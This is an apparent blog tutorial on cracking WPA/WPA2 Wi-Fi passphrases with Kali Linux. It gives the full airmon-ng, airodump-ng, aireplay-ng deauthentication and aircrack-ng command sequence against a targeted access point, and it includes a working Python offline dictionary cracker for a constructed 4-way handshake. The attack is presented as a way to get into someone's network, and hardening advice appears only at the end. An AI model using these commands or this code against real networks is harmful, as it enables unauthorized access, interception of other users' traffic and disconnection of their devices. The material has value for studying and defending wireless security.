What is Wi-Fi hacking?
In this article, Wi-Fi hacking means recovering the pre-shared key of a WPA/WPA2-protected wireless network. With that key an attacker can join the network, sniff the traffic of every client on it, and reach any device or service exposed on the LAN. Whatever they collect from your compromised Wi-Fi can then be used for their own purposes.
How does Wi-Fi hacking work?
The technique works in four stages:
- First, discover the target Wi-Fi access point (AP) by passively monitoring the Wi-Fi signals around you.
- Next, send de-authentication frames to the AP, which forces the clients connected to that AP to disconnect.
- When a client reconnects, it performs the WPA/WPA2 4-way handshake with the AP, and we capture that handshake. The handshake does not contain the password itself; it contains the two nonces and a message integrity code (MIC) computed with a key derived from the password and SSID, which is enough to test password guesses offline.
- Finally, run aircrack-ng against the captured handshake with a wordlist to recover the password.
Prerequisites to hack a Wi-Fi password
- Kali Linux installed on your computer (natively, as a dual-boot, or booted as a live operating system), and you are within range of the Wi-Fi network on which you intend to carry out the attack.
- If you want to work from a virtual machine, an external USB Wi-Fi adapter that supports monitor mode and packet injection, because a VM cannot normally drive the host's built-in adapter in monitor mode.
- If you don't have an external Wi-Fi adapter, install Kali as a dual-boot on your PC or laptop so it can use the built-in adapter directly (the built-in adapter must still support monitor mode and injection).
Steps to hack a Wi-Fi password using Kali
The following steps will help you crack a Wi-Fi password using Kali.
1. Open a terminal window in Kali
Use the keyboard shortcut Ctrl+Alt+T, or type terminal in the search box, to open a terminal window in Kali.
2. Put your Wi-Fi adapter into monitor mode
You first need to know the interface name of your Wi-Fi adapter before putting it into monitor mode. Type the following command in the terminal (on recent Kali releases ifconfig may not be installed; iw dev lists the wireless interfaces too):
ifconfig
I am going to run all the following commands on this adapter; as you can see, I have a single Wi-Fi adapter (wlan0).
Now, to put this adapter into monitor mode, type the following command in the terminal:
airmon-ng start wlan0
While the adapter is in monitor mode you cannot use it for normal internet access. Note also that airmon-ng renamed my adapter from wlan0 to wlan0mon; with some drivers and airmon-ng versions the name stays wlan0, so check what airmon-ng reports and use that name in the commands below.
Before we start monitoring Wi-Fi signals, we need to kill background processes (NetworkManager, wpa_supplicant and similar) that could reset the adapter or change its channel while we are working in monitor mode. Type the following command in the terminal window (it is equally fine to run it before airmon-ng start):
airmon-ng check kill
Once your adapter is in monitor mode you can start monitoring the Wi-Fi signals around you.
3. Start monitoring Wi-Fi signals
We use airodump-ng to scan for Wi-Fi signals. Type the following command in the terminal:
airodump-ng wlan0mon
The upper part of the screen lists every visible access point (AP) with its BSSID, channel, encryption type and ESSID; the lower part lists the clients (stations) and the AP each one is associated with.
4. Target the AP you want to hack
If your target appears in the list of visible APs and at least one client is connected to it, you can go further; otherwise you have to wait for somebody to connect to that AP first, because the handshake only happens when a client associates.
Now open a new terminal window (don't close the current one, because you need to copy the BSSID and channel from it).
Type the following command in the new terminal window.
Format: airodump-ng --bssid <BSSID of your target> -c <channel of your target AP> --write <prefix for the capture file> <name of your adapter in monitor mode>
airodump-ng --bssid 64:6C:82:E8:24:EC -c 6 --write HSfile wlan0mon
5. Capture the handshake
To capture the handshake, which carries the material needed to test password guesses, we need to disconnect the connected clients from the AP so that they reconnect. Open a new terminal window and type the following command:
aireplay-ng --deauth 10 -a 64:6C:82:E8:24:EC wlan0mon
This command sends 10 bursts of de-authentication frames, spoofed as coming from the AP, to the broadcast address, which causes every client on that AP to disconnect. To disconnect only one client, add -c <client MAC> using the station address shown in the lower part of the airodump-ng window. If aireplay-ng reports 0 ACKs, check that the adapter supports injection and that it is on the target's channel.
When the clients try to reconnect to the AP, airodump-ng records the 4-way handshake. As the screenshot shows, the top-right corner of the airodump-ng window now reads "WPA handshake: <BSSID of target>"; this message means the attack succeeded and we have captured the handshake.
The capture file is written at the location we chose in step 4: the --write prefix HSfile plus a sequence number, in my case /root/HSfile-01.cap.
6. Crack the password
The handshake does not contain the password, so there is nothing to decrypt. Instead aircrack-ng derives the key from every candidate passphrase in a wordlist and checks whether it reproduces the MIC in the captured handshake. Run the following command against HSfile-01.cap with a password list; in my case I am using a custom list named PasswordList.txt. If the capture contains more than one network, add -b <BSSID> to select the target. If the passphrase is not in the wordlist, aircrack-ng reports that it failed, so the attack works only against passphrases that appear in the list.
aircrack-ng HSfile-01.cap -w PasswordList.txt
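The following script, added here as an example and not part of the original post or of aircrack-ng, shows what the "handshake contains the password" claim in the overview and the cracking step above really mean: it derives the PMK from a candidate passphrase and SSID, expands it to the PTK with the two MAC addresses and two nonces, recomputes the MIC of the EAPOL-Key frame with the KCK and compares it with the captured MIC. The handshake it cracks is constructed inside the script (the BSSID is the one used in the walkthrough; the SSID HomeNet, the client MAC, the nonces and the passphrase are made up), so it runs offline.

```python
"""Offline WPA2-PSK dictionary attack against a 4-way handshake (constructed sample).

The handshake never carries the passphrase.  It carries the AP nonce (ANonce),
the client nonce (SNonce) and an EAPOL-Key frame whose MIC was computed with
the KCK, which is derived from the passphrase and SSID.  A cracker therefore
re-derives the MIC for every candidate and compares it with the captured one.
"""
import hashlib
import hmac
import struct

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + key IV (16) + key RSC (8) + key ID (8)
MIC_OFFSET = 81


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The 4096 iterations are the per-guess cost that makes large wordlists slow.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512 from 802.11i: label "Pairwise key expansion" over the ordered
    # MAC addresses and nonces.  The first 16 bytes of the PTK are the KCK.
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 x 20 bytes of SHA-1 output >= 64 bytes
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2 (key descriptor version 2): HMAC-SHA1 over the EAPOL frame with the
    # MIC field zeroed, truncated to 16 bytes.
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    # Minimal EAPOL-Key message 2 (client -> AP).  Key info 0x010A = descriptor
    # version 2, pairwise, MIC present.  The RSN IE key data is omitted here.
    body = (bytes([2])                      # descriptor type: RSN
            + struct.pack(">H", 0x010A)     # key information
            + struct.pack(">H", 16)         # key length (CCMP)
            + (1).to_bytes(8, "big")        # replay counter
            + snonce
            + b"\x00" * 16                  # key IV
            + b"\x00" * 8                   # key RSC
            + b"\x00" * 8                   # key ID
            + mic
            + struct.pack(">H", 0))         # key data length
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body  # EAPOL v2, type Key


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, eapol_msg2, wordlist):
    """Return the passphrase from wordlist that reproduces the captured MIC, or None."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


def make_sample_capture():
    """Constructed handshake: a client joining SSID 'HomeNet' with passphrase
    'correct horse'.  The AP BSSID is the one used in the walkthrough; the
    client MAC and the nonces are made up for this example."""
    ssid, passphrase = "HomeNet", "correct horse"
    ap_mac = mac_bytes("64:6C:82:E8:24:EC")
    client_mac = mac_bytes("00:11:22:33:44:55")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    # The client computes the real MIC with the KCK; that is what airodump-ng records.
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, client_mac, anonce, snonce)[:16]
    frame = build_eapol_msg2(snonce)
    frame = build_eapol_msg2(snonce, eapol_mic(kck, frame))
    return ssid, ap_mac, client_mac, anonce, snonce, frame


if __name__ == "__main__":
    capture = make_sample_capture()
    wordlist = ["password", "12345678", "correct horse", "letmein"]
    print("recovered:", crack_handshake(*capture, wordlist))  # correct horse
```

Two things follow from this for the walkthrough: the capture must contain the ANonce (message 1 or 3), the SNonce and a MIC'd frame (message 2 or 4) for the same client, which is why airodump-ng only reports "WPA handshake" after a client reassociates; and every guess costs 4096 HMAC-SHA1 iterations, so the attack is bounded by the size of the wordlist, not by anything in the handshake.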
How to exit monitor mode?
Type the following commands (on a systemd-based Kali, systemctl restart NetworkManager does the same as the service command):
airmon-ng stop wlan0mon
service NetworkManager restart
How to secure your wireless network from getting hacked?
- Change the default password your router shipped with.
- Use a long passphrase (at least 12 characters; longer is better). The attack above only succeeds if your passphrase appears in the attacker's wordlist, so a long random passphrase defeats it outright.
- Mix symbols and numbers into the passphrase, and avoid dictionary words and personal details, which are exactly what wordlists are built from.
- Use WPA2 with AES/CCMP, or WPA3 where your devices support it, and enable Protected Management Frames (802.11w) if your router offers them; they authenticate de-authentication frames, so the forced disconnect in step 5 no longer works.
- Restricting access to registered MAC addresses adds only a small hurdle: MAC addresses are sent in the clear and an attacker who sees a permitted client in airodump-ng can spoof it, so do not rely on MAC filtering in place of a strong passphrase.